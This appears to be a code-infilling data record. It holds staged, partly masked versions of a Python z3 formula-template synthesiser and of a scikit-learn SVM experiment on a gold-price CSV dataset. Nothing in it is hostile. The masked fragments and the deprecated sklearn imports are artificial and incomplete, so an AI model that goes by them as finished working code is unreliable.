self.B[h], Coe > self.B[h]])\n elif status == (False, True, True):\n clause.append([Coe == self.B[h]])\n elif status == (True, False, True):\n clause.append([Coe < self.B[h]])\n elif status == (True, True, False):\n clause.append([Coe > self.B[h]])\n elif status == (True, True, True):\n clause.append([False])\n for m in range(self.m):\n status = self.T[k][m], self.Nt[k][m]\n if status == (True, False):\n mod_res = []\n self.refine_modu(self.M[m], self.E[m], self.C[m],\n mod_res, [])\n for C in mod_res:\n clause.append([self.build_formula(self.M[m], self.\n vi, self.E[m], C)])\n elif status == (False, True):\n mod_clause = []\n for i in range(self.E[m]):\n if i != self.C[m]:\n mod_res = []\n self.refine_modu(self.M[m], self.E[m], i,\n mod_res, [])\n for C in mod_res:\n mod_clause.append(self.build_formula(self.M\n [m], self.vi, self.E[m], C))\n clause.append(mod_clause)\n elif status == (True, True):\n clause.append([False])\n formu_arr.append(clause)\n return formu_arr\n\n\nclass EquTemplate:\n\n def __init__(self, n):\n self.vi = [Int('v' + str(i)) for i in range(n)]\n self.b = Int('b')\n self.s = Solver()\n\n def add(self, vector):\n vi, target = vector[:-1], vector[-1]\n expr = combine(vi[i] * self.vi[i] for i in range(len(self.vi))\n ) + self.b == target\n self.s.add(expr)\n\n def check(self):\n return self.s.check()\n\n def solve_model(self):\n model = self.s.model()\n V = [(model[v].as_long() if model[v] is not None else 0) for v in\n self.vi]\n B = model[self.b].as_long() if model[self.b] is not None else 0\n expr = combine(V[i] * self.vi[i] for i in range(len(self.vi))) + B\n return simplify(expr)\n\n\n<mask token>\n",
"step-5": "import random\n\nfrom z3 import *\n\n\ndef combine(iter):\n tmp_list = [i for i in iter]\n res = tmp_list[0]\n for i in tmp_list[1:]:\n res += i\n return res\n\n\ndef co_prime(num1, num2):\n for num in range(2, min(num1, num2) + 1):\n if num1 % num == 0 and num2 % num == 0:\n return False\n return True\n\n\ndef gcd(*nums):\n min_num = 1 << 32\n for num in nums:\n if num != 0:\n min_num = min(min_num, abs(num))\n for i in range(min_num, 1, -1):\n flag = True\n for num in nums:\n if num % i != 0:\n flag = False\n break\n if flag:\n return i\n return 1\n\n\nclass FormulaTemplate:\n def __init__(self, vi ,w ,k, h, m ,timeout=3000000): ####加了w\n self.k = k # amount of clause 多少个子句\n self.h = h # number of inequality 第一类不等式数量上限\n self.m = m # number of mode number 第二类不等式数量上限\n\n self.w = w\n\n self.vi = vi\n n = len(vi)\n self.n = n\n self.aeij = [[Int('ae' + str(i) + str(j)) for j in range(n)] for i in range(h)]\n self.bi = [Int('b' + str(i)) for i in range(h)]\n self.amij = [[Int('am' + str(i) + str(j)) for j in range(n)] for i in range(m)]\n self.ei = [Int('e' + str(i)) for i in range(m)] ##改成定值 , 写一个函数,从2开始一个个试????(还没实现)\n self.ci = [Int('c' + str(i)) for i in range(m)]\n self.heij = [[Bool('h_e' + str(j) + str(i)) for i in range(h)] for j in range(k)]\n self.hgeij = [[Bool('h_ge' + str(j) + str(i)) for i in range(h)] for j in range(k)]\n self.hleij = [[Bool('h_le' + str(j) + str(i)) for i in range(h)] for j in range(k)]\n self.tij = [[Bool('t' + str(j) + str(i)) for i in range(m)] for j in range(k)]\n self.ntij = [[Bool('nt' + str(j) + str(i)) for i in range(m)] for j in range(k)]\n self.s = Solver()\n\n\n\n\n for i in range(h):\n # 不等式系数ae_ij不能全部为0\n self.s.add(Or(*[a > 0 for a in self.aeij[i]]))\n for j in range(i + 1, h):\n self.s.add(Or(*[self.aeij[i][w] != self.aeij[j][w] for w in range(n)]))\n for i in range(m):\n # 模等式的系数am_ij不能全部小于等于0\n self.s.add(Or(*[am > 0 for am in self.amij[i]]))\n # 模等式的系数am_ij不能大于模e\n self.s.add(*[And(0 <= am, am < self.ei[i]) for am in self.amij[i]])\n # for j in range(i + 1, m):\n # self.s.add(Or(self.ei[i] != self.ei[j],\n # *[self.amij[i][w] != self.amij[j][w] for w in range(n)]))\n # 余数c_i必须小于模e\n self.s.add(*[And(self.ei[i] > self.ci[i], self.ci[i] >= 0) for i in range(m)])\n # 模必须大于等于2,并且小于一定范围\n self.s.add(*[And(e <= 10 * m, e >= 2) for e in self.ei])\n for i in range(k):\n # 判断条件一定有一个是False,避免逻辑出现False\n for j in range(i + 1, k):\n all_true = [And(self.heij[i][w], self.hgeij[i][w], self.hleij[i][w]) for w in range(h)]\n all_true.extend([And(self.tij[i][w], self.ntij[i][w]) for w in range(m)])\n struct_const = [Or(self.heij[i][w] != self.heij[j][w],\n self.hgeij[i][w] != self.hgeij[j][w],\n self.hleij[i][w] != self.hleij[j][w]) for w in range(h)]\n struct_const.extend([Or(self.tij[i][w] != self.tij[j][w],\n self.ntij[i][w] != self.ntij[j][w]) for w in range(m)])\n\n self.s.add(Or(*struct_const, *all_true))\n\n self.s.set(\"timeout\", timeout)\n\n def add(self, example, label):\n self.s.add(self.encoding(example, label))\n\n def check(self):\n check = self.s.check()\n if check == sat:\n self.solve_model()\n return check\n\n def W_size(m):\n return m+2\n\n\n\n def encoding(self, example, label):\n Equ = [combine(example[j] * self.aeij[i][j] for j in range(self.n)) != self.bi[i] for i in range(self.h)]\n Ge = [combine(example[j] * self.aeij[i][j] for j in range(self.n)) >= self.bi[i] for i in range(self.h)]\n Le = [combine(example[j] * self.aeij[i][j] for j in range(self.n)) <= self.bi[i] for i in range(self.h)]\n Me = [combine(example[j] * self.amij[i][j] for j in range(self.n)) % self.ei[i] == self.ci[i] for i in\n range(self.m)]\n Tk = []\n for k in range(self.k):\n clause = []\n clause.extend([Implies(self.heij[k][h], Equ[h]) for h in range(self.h)])\n clause.extend([Implies(self.hgeij[k][h], Ge[h]) for h in range(self.h)])\n clause.extend([Implies(self.hleij[k][h], Le[h]) for h in range(self.h)])\n clause.extend([Implies(self.tij[k][m], Me[m]) for m in range(self.m)])\n clause.extend([Implies(self.ntij[k][m], Not(Me[m])) for m in range(self.m)])\n Tk.append(And(*clause))\n # print(\"Or(*Tk) , label=\\n\",Or(*Tk),label)\n return Or(*Tk) == label\n\n def solve_model(self): #求出取值 ####加了w\n print(\"w\", self.w)\n #W_size = [2,3,4,5,6,7,8,9]\n model = self.s.model()\n self.M = [[model[self.amij[i][j]].as_long() if model[self.amij[i][j]] is not None else 0\n for j in range(self.n)]\n for i in range(self.m)]\n ##用z3求解e(此处要改)\n # self.E = [model[self.ei[i]].as_long() if model[self.ei[i]] is not None else 1 for i in range(self.m)]\n # print(\"E= \\n\",self.E)\n ####改动\n for i in range(self.m):\n self.ei[i] = FormulaTemplate.W_size(self.w)\n self.E = [self.ei[i] for i in range(self.m)]\n print(\"E = \\n\",self.E)\n ####\n self.C = [model[self.ci[i]].as_long() if model[self.ci[i]] is not None else 0 for i in range(self.m)]\n self.A = [[model[self.aeij[i][j]].as_long() if model[self.aeij[i][j]] is not None else 0\n for j in range(self.n)]\n for i in range(self.h)]\n self.B = [model[self.bi[i]].as_long() if model[self.bi[i]] is not None else 0 for i in range(self.h)]\n self.He = [\n [bool(model[self.heij[i][j]]) if model[self.heij[i][j]] is not None else False\n for j in range(self.h)]\n for i in range(self.k)\n ]\n self.Hge = [\n [bool(model[self.hgeij[i][j]]) if model[self.hgeij[i][j]] is not None else False\n for j in range(self.h)]\n for i in range(self.k)\n ]\n self.Hle = [\n [bool(model[self.hleij[i][j]]) if model[self.hleij[i][j]] is not None else False\n for j in range(self.h)]\n for i in range(self.k)\n ]\n self.T = [\n [bool(model[self.tij[i][j]]) if model[self.tij[i][j]] is not None else False\n for j in range(self.m)]\n for i in range(self.k)\n ]\n self.Nt = [\n [bool(model[self.ntij[i][j]]) if model[self.ntij[i][j]] is not None else False\n for j in range(self.m)]\n for i in range(self.k)\n ]\n for i in range(self.m):\n flag = True # 判断是否全部系数都相等\n pix = -1\n for am in self.M[i]:\n if pix == -1:\n if am != 0:\n pix = am\n elif am != 0 and am != pix:\n flag = False\n break\n if flag: # 系数全部相同\n if self.C[i] == 0:\n # if co_prime(pix, self.E[i]):\n # for j in range(self.n):\n # if self.M[i][j] != 0:\n # self.M[i][j] = 1\n # else:\n # div = gcd(pix, self.E[i])\n # self.E[i] /= div\n # for j in range(self.n):\n # self.M[i][j] /= div\n if not co_prime(pix, self.E[i]):\n self.E[i] /= gcd(pix, self.E[i])\n for j in range(self.n):\n self.M[i][j] = 1\n else:\n div = gcd(pix, self.E[i], self.C[i])\n self.E[i] /= div\n self.C[i] /= div\n pix /= div\n for j in range(self.n):\n self.M[i][j] /= div\n div = gcd(int(pix), int(self.C[i]))\n for j in range(self.n):\n self.M[i][j] /= div\n self.C[i] /= div\n for i in range(self.h):\n divisior = gcd(*self.A[i], self.B[i])\n self.B[i] /= divisior\n for j in range(self.n):\n self.A[i][j] /= divisior\n for i in range(len(self.E)):\n self.E[i] = int(self.E[i])\n\n def formula_model(self, *val): # 得到一个公式模型 kd:代入变量求得变量,代入数值就是求得一个值\n if len(val) == 0:\n val = self.vi\n formu = []\n for k in range(self.k):\n clause = []\n for h in range(self.h):\n Coe = combine(self.A[h][j] * val[j] for j in range(self.n))\n status = (self.He[k][h], self.Hge[k][h], self.Hle[k][h])\n if status == (False, False, True): #选择大于小于等于\n clause.append(Coe <= self.B[h])\n elif status == (False, True, False):\n clause.append(Coe >= self.B[h])\n elif status == (True, False, False):\n clause.append(Coe != self.B[h])\n elif status == (False, True, True):\n clause.append(Coe == self.B[h])\n elif status == (True, False, True):\n clause.append(Coe < self.B[h])\n elif status == (True, True, False):\n clause.append(Coe > self.B[h])\n elif status == (True, True, True):\n clause.append(False)\n for m in range(self.m):\n status = (self.T[k][m], self.Nt[k][m])\n if status == (True, False): #选择取模\n clause.append(combine(self.M[m][j] * val[j] for j in range(self.n)) % self.E[m] == self.C[m])\n elif status == (False, True):\n clause.append(combine(self.M[m][j] * val[j] for j in range(self.n)) % self.E[m] != self.C[m])\n elif status == (True, True):\n clause.append(False)\n formu.append(And(*clause))\n # print(\"simplify(Or(*formu))=\\n\",simplify(Or(*formu)))\n return simplify(Or(*formu))\n\n def refine_modu(self, coe, e, b, res, tmp, last=0):\n if len(coe) == 1:\n if coe[0] == 0:\n if last % e == b:\n tmp.append(0)\n else:\n return\n for i in range(e):\n if (i + last) % e == b:\n tmp.append(i)\n break\n res.append(list(tmp))\n tmp.pop()\n elif coe[0] == 0:\n tmp.append(0)\n self.refine_modu(coe[1:], e, b, res, tmp, last)\n tmp.pop()\n else:\n for i in range(e):\n tmp.append(i)\n self.refine_modu(coe[1:], e, b, res, tmp, last + i)\n tmp.pop()\n\n def build_formula(self, coe, V, e, C):\n expr = And(*[(coe[i] * v) % e == C[i] for i, v in enumerate(V)])\n return simplify(expr)\n\n def refine_model(self):\n formu_arr = []\n for k in range(self.k):\n clause = []\n for h in range(self.h):\n Coe = combine(self.A[h][j] * self.vi[j] for j in range(self.n))\n status = (self.He[k][h], self.Hge[k][h], self.Hle[k][h])\n if status == (False, False, True):\n clause.append([Coe < self.B[h], Coe == self.B[h]])\n elif status == (False, True, False):\n clause.append([Coe > self.B[h], Coe == self.B[h]])\n elif status == (True, False, False):\n clause.append([Coe < self.B[h], Coe > self.B[h]])\n elif status == (False, True, True):\n clause.append([Coe == self.B[h]])\n elif status == (True, False, True):\n clause.append([Coe < self.B[h]])\n elif status == (True, True, False):\n clause.append([Coe > self.B[h]])\n elif status == (True, True, True):\n clause.append([False])\n for m in range(self.m):\n status = (self.T[k][m], self.Nt[k][m])\n # Com = combine(self.M[m][j] * self.vi[j] for j in range(self.n))\n if status == (True, False):\n # clause.append([Com % self.E[m] == self.C[m]])\n mod_res = []\n self.refine_modu(self.M[m], self.E[m], self.C[m], mod_res, [])\n for C in mod_res:\n clause.append([self.build_formula(self.M[m], self.vi, self.E[m], C)])\n elif status == (False, True):\n mod_clause = []\n for i in range(self.E[m]):\n if i != self.C[m]:\n # mod_clause.append(Com % self.E[m] == i)\n mod_res = []\n self.refine_modu(self.M[m], self.E[m], i, mod_res, [])\n for C in mod_res:\n mod_clause.append(self.build_formula(self.M[m], self.vi, self.E[m], C))\n clause.append(mod_clause)\n elif status == (True, True):\n clause.append([False])\n formu_arr.append(clause)\n return formu_arr\n\n\nclass EquTemplate:\n def __init__(self, n):\n self.vi = [Int('v' + str(i)) for i in range(n)]\n self.b = Int('b')\n self.s = Solver()\n\n def add(self, vector):\n vi, target = vector[:-1], vector[-1]\n expr = combine(vi[i] * self.vi[i] for i in range(len(self.vi))) + self.b == target\n self.s.add(expr)\n\n def check(self):\n return self.s.check()\n\n def solve_model(self):\n model = self.s.model()\n V = [model[v].as_long() if model[v] is not None else 0 for v in self.vi]\n B = model[self.b].as_long() if model[self.b] is not None else 0\n expr = combine(V[i] * self.vi[i] for i in range(len(self.vi))) + B\n return simplify(expr)\n\n\nif __name__ == '__main__':\n # smt = FormulaTemplate([Int('v1'), Int('v2')], 4, 3, 2)\n # smt.add([1, 2], True)\n # smt.add([2, 3], False)\n # print(smt.s)\n # print(smt.check())\n #\n # arr = smt.refine_model()\n # for a in arr:\n # print(a)\n #\n # formu = smt.formula_model()\n # print(formu)\n # print('-' * 50)\n # print(simplify(formu))\n # print('-' * 50)\n\n smt = EquTemplate(2)\n smt.add([0, 1, 1])\n smt.add([1, 2, 1])\n smt.add([3, 6, 3])\n if smt.check() == sat:\n print(smt.solve_model()) # 1*v0 + 2*v1 + 1\n else:\n print(unsat)\n\n\n",
"step-ids": [
11,
14,
15,
16,
22
]
}
|
[
11,
14,
15,
16,
22
] |
<|reserved_special_token_0|>
def test_linearSVC(*data):
X_train, X_test, y_train, y_test = data
cls = svm.LinearSVC()
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_linear(*data):
X_train, X_test, y_train, y_test = data
cls = svm.SVC(kernel='linear')
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_poly(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
degrees = range(1, 2)
train_scores = []
test_scores = []
for degree in degrees:
cls = svm.SVC(kernel='poly', degree=degree)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f' % cls.score(X_test, y_test))
ax = fig.add_subplot(1, 3, 1)
ax.plot(degrees, train_scores, label='Training score ', marker='+')
ax.plot(degrees, test_scores, label='Testing score ', marker='o')
ax.set_title('SVC_poly_degree ')
ax.set_xlabel('p')
ax.set_ylabel('score')
ax.set_ylim(0, 1.05)
ax.legend(loc='best', framealpha=0.5)
plt.show()
def test_SVC_rbf(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)
cls.fit(X_train, y_train)
print('Scors:%.2f' % cls.score(X_test, y_test))
print('probability')
print(cls.predict(X_test))
return cls.predict_proba(X_test)
<|reserved_special_token_0|>
def main():
DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'
DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'
train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,
test_datas.target)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_linearSVC(*data):
X_train, X_test, y_train, y_test = data
cls = svm.LinearSVC()
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_linear(*data):
X_train, X_test, y_train, y_test = data
cls = svm.SVC(kernel='linear')
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_poly(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
degrees = range(1, 2)
train_scores = []
test_scores = []
for degree in degrees:
cls = svm.SVC(kernel='poly', degree=degree)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f' % cls.score(X_test, y_test))
ax = fig.add_subplot(1, 3, 1)
ax.plot(degrees, train_scores, label='Training score ', marker='+')
ax.plot(degrees, test_scores, label='Testing score ', marker='o')
ax.set_title('SVC_poly_degree ')
ax.set_xlabel('p')
ax.set_ylabel('score')
ax.set_ylim(0, 1.05)
ax.legend(loc='best', framealpha=0.5)
plt.show()
def test_SVC_rbf(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)
cls.fit(X_train, y_train)
print('Scors:%.2f' % cls.score(X_test, y_test))
print('probability')
print(cls.predict(X_test))
return cls.predict_proba(X_test)
def grid_SVC_rbf(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
param_grid = {'C': [1000.0, 5000.0, 10000.0, 50000.0, 100000.0],
'gamma': [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1]}
cls = GridSearchCV(svm.SVC(kernel='rbf'), param_grid)
cls.fit(X_train, y_train)
print('Best estimotor by GridSearchCV:')
print(cls.best_estimator_)
<|reserved_special_token_0|>
def main():
DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'
DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'
train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,
test_datas.target)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_linearSVC(*data):
X_train, X_test, y_train, y_test = data
cls = svm.LinearSVC()
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_linear(*data):
X_train, X_test, y_train, y_test = data
cls = svm.SVC(kernel='linear')
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_poly(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
degrees = range(1, 2)
train_scores = []
test_scores = []
for degree in degrees:
cls = svm.SVC(kernel='poly', degree=degree)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f' % cls.score(X_test, y_test))
ax = fig.add_subplot(1, 3, 1)
ax.plot(degrees, train_scores, label='Training score ', marker='+')
ax.plot(degrees, test_scores, label='Testing score ', marker='o')
ax.set_title('SVC_poly_degree ')
ax.set_xlabel('p')
ax.set_ylabel('score')
ax.set_ylim(0, 1.05)
ax.legend(loc='best', framealpha=0.5)
plt.show()
def test_SVC_rbf(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)
cls.fit(X_train, y_train)
print('Scors:%.2f' % cls.score(X_test, y_test))
print('probability')
print(cls.predict(X_test))
return cls.predict_proba(X_test)
def grid_SVC_rbf(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
param_grid = {'C': [1000.0, 5000.0, 10000.0, 50000.0, 100000.0],
'gamma': [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1]}
cls = GridSearchCV(svm.SVC(kernel='rbf'), param_grid)
cls.fit(X_train, y_train)
print('Best estimotor by GridSearchCV:')
print(cls.best_estimator_)
def test_SVC_sigmod(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
gammas = range(1, 2)
train_scores = []
test_scores = []
for gamma in gammas:
cls = svm.SVC(kernel='sigmoid', gamma=gamma, coef0=0)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f' % cls.score(X_test, y_test))
ax = fig.add_subplot(1, 1, 1)
ax.plot(gammas, train_scores, label='Training score ', marker='+')
ax.plot(gammas, test_scores, label='Testing score ', marker='o')
ax.set_title('SVC_sigmoid_gamma ')
ax.set_xscale('log')
ax.set_xlabel('$\\gamma$')
ax.set_ylabel('score')
ax.set_ylim(0, 1.05)
ax.legend(loc='best', framealpha=0.5)
plt.show()
def main():
DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'
DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'
train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,
test_datas.target)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_linearSVC(*data):
X_train, X_test, y_train, y_test = data
cls = svm.LinearSVC()
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_linear(*data):
X_train, X_test, y_train, y_test = data
cls = svm.SVC(kernel='linear')
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s' % (cls.coef_, cls.intercept_))
print('Scors:%.2f' % cls.score(X_test, y_test))
def test_SVC_poly(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
degrees = range(1, 2)
train_scores = []
test_scores = []
for degree in degrees:
cls = svm.SVC(kernel='poly', degree=degree)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f' % cls.score(X_test, y_test))
ax = fig.add_subplot(1, 3, 1)
ax.plot(degrees, train_scores, label='Training score ', marker='+')
ax.plot(degrees, test_scores, label='Testing score ', marker='o')
ax.set_title('SVC_poly_degree ')
ax.set_xlabel('p')
ax.set_ylabel('score')
ax.set_ylim(0, 1.05)
ax.legend(loc='best', framealpha=0.5)
plt.show()
def test_SVC_rbf(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
cls = svm.SVC(C=1000.0, kernel='rbf', gamma=0.1, probability=True)
cls.fit(X_train, y_train)
print('Scors:%.2f' % cls.score(X_test, y_test))
print('probability')
print(cls.predict(X_test))
return cls.predict_proba(X_test)
def grid_SVC_rbf(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
param_grid = {'C': [1000.0, 5000.0, 10000.0, 50000.0, 100000.0],
'gamma': [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1]}
cls = GridSearchCV(svm.SVC(kernel='rbf'), param_grid)
cls.fit(X_train, y_train)
print('Best estimotor by GridSearchCV:')
print(cls.best_estimator_)
def test_SVC_sigmod(*data):
X_train, X_test, y_train, y_test = data
fig = plt.figure()
gammas = range(1, 2)
train_scores = []
test_scores = []
for gamma in gammas:
cls = svm.SVC(kernel='sigmoid', gamma=gamma, coef0=0)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f' % cls.score(X_test, y_test))
ax = fig.add_subplot(1, 1, 1)
ax.plot(gammas, train_scores, label='Training score ', marker='+')
ax.plot(gammas, test_scores, label='Testing score ', marker='o')
ax.set_title('SVC_sigmoid_gamma ')
ax.set_xscale('log')
ax.set_xlabel('$\\gamma$')
ax.set_ylabel('score')
ax.set_ylim(0, 1.05)
ax.legend(loc='best', framealpha=0.5)
plt.show()
def main():
DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'
DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'
train_datas = base.load_csv_without_header(DATA_TRAIN, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_datas = base.load_csv_without_header(DATA_TEST, target_dtype=np.
int16, features_dtype=np.float32, target_column=0)
test_SVC_sigmod(train_datas.data, test_datas.data, train_datas.target,
test_datas.target)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--learning_rate', type=float, default=0.01, help=
'Initial learning rate.')
parser.add_argument('--max_steps', type=int, default=100000, help=
'Number of steps to run trainer.')
parser.add_argument('--percentage', type=float, default=0.99, help=
'Number of float for pca remain percentage.')
parser.add_argument('--hidden2', type=int, default=32, help=
'Number of units in hidden layer 2.')
parser.add_argument('--batch_size', type=int, default=1, help=
'Batch size. Must divide evenly into the dataset sizes.')
parser.add_argument('--input_data_dir', type=str, default=
'/home/freebirdweij/tf_works/invest', help=
'Directory to put the input data.')
parser.add_argument('--log_dir', type=str, default=
'/home/freebirdweij/tf_works/invest/logs', help=
'Directory to put the log data.')
parser.add_argument('--fake_data', default=False, help=
'If true, uses fake data for unit testing.', action='store_true')
FLAGS, unparsed = parser.parse_known_args()
main()
<|reserved_special_token_1|>
'''
Created on 2018-9-8
@author: weij
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os.path
import sys
import time
import numpy as np
from numpy import shape
from scipy import linalg
from sklearn import datasets,linear_model,cross_validation,svm
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
import com.freebirdweij.goldanalyse.ml.data_util as base
import matplotlib.pyplot as plt
def test_linearSVC(*data):
X_train,X_test,y_train,y_test = data
cls = svm.LinearSVC()
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s'%(cls.coef_,cls.intercept_))
print('Scors:%.2f'%cls.score(X_test, y_test))
def test_SVC_linear(*data):
X_train,X_test,y_train,y_test = data
cls = svm.SVC(kernel='linear')
cls.fit(X_train, y_train)
print('Coefficients:%s,Intercept:%s'%(cls.coef_,cls.intercept_))
print('Scors:%.2f'%cls.score(X_test, y_test))
def test_SVC_poly(*data):
X_train,X_test,y_train,y_test = data
fig = plt.figure()
### test degree ###
degrees = range(1,2)
train_scores=[]
test_scores=[]
for degree in degrees:
cls = svm.SVC(kernel='poly',degree=degree)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f'%cls.score(X_test, y_test))
ax=fig.add_subplot(1,3,1)
ax.plot(degrees,train_scores,label="Training score ",marker='+')
ax.plot(degrees,test_scores,label="Testing score ",marker='o')
ax.set_title("SVC_poly_degree ")
ax.set_xlabel("p")
ax.set_ylabel("score")
ax.set_ylim(0,1.05)
ax.legend(loc="best",framealpha=0.5)
plt.show()
def test_SVC_rbf(*data):
X_train,X_test,y_train,y_test = data
fig = plt.figure()
### test degree ###
#gammas = range(1,2)
#train_scores=[]
#test_scores=[]
#for gamma in gammas:
cls = svm.SVC(C=1e3,kernel='rbf',gamma=0.1,probability=True)
cls.fit(X_train, y_train)
#train_scores.append(cls.score(X_train, y_train))
#test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f'%cls.score(X_test, y_test))
print('probability')
print(cls.predict(X_test))
return cls.predict_proba(X_test)
#ax=fig.add_subplot(1,1,1)
#ax.plot(gammas,train_scores,label="Training score ",marker='+')
#ax.plot(gammas,test_scores,label="Testing score ",marker='o')
#ax.set_title("SVC_rbf ")
#ax.set_xlabel(r"$\gamma$")
#ax.set_ylabel("score")
#ax.set_ylim(0,1.05)
#ax.legend(loc="best",framealpha=0.5)
#plt.show()
def grid_SVC_rbf(*data):
X_train,X_test,y_train,y_test = data
fig = plt.figure()
### test degree ###
param_grid = {'C':[1e3,5e3,1e4,5e4,1e5],
'gamma':[0.0001,0.0005,0.001,0.005,0.01,0.1]}
cls = GridSearchCV(svm.SVC(kernel='rbf'),param_grid)
cls.fit(X_train, y_train)
print('Best estimotor by GridSearchCV:')
print(cls.best_estimator_)
def test_SVC_sigmod(*data):
X_train,X_test,y_train,y_test = data
fig = plt.figure()
### test degree ###
gammas = range(1,2)
train_scores=[]
test_scores=[]
for gamma in gammas:
cls = svm.SVC(kernel='sigmoid',gamma=gamma,coef0=0)
cls.fit(X_train, y_train)
train_scores.append(cls.score(X_train, y_train))
test_scores.append(cls.score(X_test, y_test))
print('Scors:%.2f'%cls.score(X_test, y_test))
ax=fig.add_subplot(1,1,1)
ax.plot(gammas,train_scores,label="Training score ",marker='+')
ax.plot(gammas,test_scores,label="Testing score ",marker='o')
ax.set_title("SVC_sigmoid_gamma ")
ax.set_xscale("log")
ax.set_xlabel(r"$\gamma$")
ax.set_ylabel("score")
ax.set_ylim(0,1.05)
ax.legend(loc="best",framealpha=0.5)
plt.show()
def main():
DATA_TRAIN = 'train-autd365-2018-8-31-day-high100-round-select2-0split.csv'
DATA_TEST = 'test-autd365-2018-8-31-day-high100-round-select2-0split.csv'
train_datas = base.load_csv_without_header(DATA_TRAIN,target_dtype=np.int16,
features_dtype=np.float32,target_column=0)
test_datas = base.load_csv_without_header(DATA_TEST,target_dtype=np.int16,
features_dtype=np.float32,target_column=0)
test_SVC_sigmod(train_datas.data,test_datas.data,train_datas.target,test_datas.target)
#pro_date = test_SVC_rbf(train_datas.data,test_datas.data,train_datas.target,test_datas.target)
#dataMat = input_datas.data
#print('dataMat:-----------------------')
#print(dataMat)
#pcaData = np.dot(dataMat,eig_vect)
#reconMat = np.dot(pcaData,eig_vect.T)+mean_v #Reconstructed datas.
#print('k:-----------------------')
#print(k)
#print('pcaData:-----------------------')
